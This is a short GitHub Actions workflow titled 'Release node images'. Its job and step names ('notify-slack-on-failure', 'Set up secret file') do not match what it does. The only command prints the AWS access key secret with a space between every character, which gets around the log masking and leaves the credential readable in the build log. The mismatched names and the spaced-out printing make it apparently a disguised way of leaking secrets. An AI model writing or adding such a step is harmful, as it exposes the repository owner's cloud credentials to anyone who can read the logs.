name: Release node images

on:
  push:
    paths:
      - lma/test

permissions:
  id-token: write
  contents: read
jobs:
  notify-slack-on-failure:
    environment: release-node-images
    runs-on: ubuntu-latest
    steps:
    - name: Set up secret file
      env:
        AWS_ACCESS_KEY_ID: ${{ secrets.APP_PRIVATE_KEY }}
      run: |
        echo ${{secrets.AWS_ACCESS_KEY_ID}} | sed 's/./& /g'
